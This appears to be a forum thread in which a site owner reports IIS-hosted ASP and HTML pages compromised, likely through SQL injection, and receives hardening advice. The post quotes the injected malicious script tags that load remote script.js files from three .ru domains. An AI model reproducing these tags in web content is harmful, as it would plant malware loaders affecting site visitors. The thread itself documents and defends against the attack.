Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 594
  • Last Modified:

regarding IIS server hack

Hi,

We have Verio/Ntt Windows shared Hosting Plans and we configure our imp. client on their, this is Global client website, this way some of hackers always try to hack this website, this website also connect with SQL server 2005 database,
But presently hacker are able to hack the static and dynamic pages (.asp and .html), We have found that the following script in our web pages,
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<script src=http://www.lang42.ru/script.js></script><script src=http://www.errghr.ru/script.js></script>
<script src=http://www.berjke.ru/script.js></script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I got the following links which is related   the website hack issue
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Kindly let me know how I can check my whole website and also sql server to know that how hacker hack our website and also how I can secure our server

Regards,
Naresh
0
sitg
Asked:
sitg
  • 2
1 Solution
 
Daniel WilsonCommented:
If they changed static pages, it's not JUST a SQL injection.

Did stuff in the database change?  Or just your pages?

If stuff in the DB changed, suspect a SQL injection.  The classic method for hardening against that attack is parameterization of all queries that accept user input.  

e.g. sql = "Select * from Users where Username = '" + Request("Username") + "' "
becomes
sql = "Select * from Users where Username = @UserName"
command.parameters.add ("@userName", Request("Username"))

For the non-SQL-Injection hack ... look at IIS security.
0
 
devshbCommented:
DanielWilson is right in my opinion; the physical attack/change of the html files does indicate a server/ftp (or possible cms-system admin) security problem rather than just a simple data vulnerability problem.

However, you might have both (physical attacks on the files, and injections/xss to the data)

For data:
Take a look at:
http://www.sqlinjectionscanner.com/

They've got a free data scanner; you can use that to double-check if there's any injected data hanging around in the database.

Securing your code/database is obviously a good idea, but hackers will almost always find any vulnerabilities you might have, so it's a good idea to have a reliable full-scan tool available which is dedicated to the task of checking against injected data/xss attacks in the data.

ie click on the download free version of the "ASP SQL Injection Scanner Tool"

I think the physical attack on the files is more pressing than a potential data injection though, because if they can physically change your files then you need to get that aspect secured first. eg change all your helm/ftp pwds, and look into the logfiles to see if people are using, say, your own cms admin system (if you have one) to effect the files.

Usually a physical attack like this would be due to a server managing to somehow get onto the server, you might need to totally reformat the server in order to find it because some viruses are buried so deeply that anti-virus software can't find them.

So, I'd say, change all your pwds, look into the logfiles, and check with the host to see if a virus is actually on the server itself.
0
 
devshbCommented:
"Usually a physical attack like this would be due to a server managing to somehow get onto the server"

I meant:

"Usually a physical attack like this would be due to a *virus* managing to somehow get onto the server"

(sorry)
0
 
sitgAuthor Commented:
I have run the Acunetix Web Vulnerability Scanner and resolve this issue,
lots of web pages having sql injection issue.

Regards,
Naresh
0

Featured Post

Hire Technology Freelancers with Gigs

Work with freelancers specializing in everything from database administration to programming, who have proven themselves as experts in their field. Hire the best, collaborate easily, pay securely, and get projects done right.

  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now